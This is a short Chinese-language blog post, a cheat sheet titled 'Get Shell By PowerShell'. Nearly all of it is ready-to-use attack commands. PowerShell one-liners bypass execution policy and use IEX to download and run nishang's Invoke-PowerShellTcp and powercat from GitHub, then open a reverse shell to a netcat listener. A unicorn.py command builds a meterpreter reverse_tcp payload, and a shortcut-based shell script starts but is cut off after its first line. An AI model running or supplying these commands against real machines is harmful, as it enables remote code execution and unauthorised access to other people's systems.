Get Shell By PowerShell
Invoke-PowerShellTcp.ps1
监听:nc -nv -l -p 9999
目标执行:
1 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 监听主机ip -Port 监听端口" |
unicorn.py
1 | python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 |
powercat.ps1
监听:nc -nv -l -p 9999
目标执行:
1 | powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 监听主机ip -p 9999 -e cmd.exe" |
Lnk Powershell
生成快捷方式shell的Powershell脚本
1 | $WshShell = New-Object -comObject WScript.Shell |
- Post title:Get Shell By PowerShell
- Post author:ssooking
- Create time:2017-08-30 15:12:00
- Post link:https://ssooking.github.io/2017/08/get-shell-by-powershell/
- Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.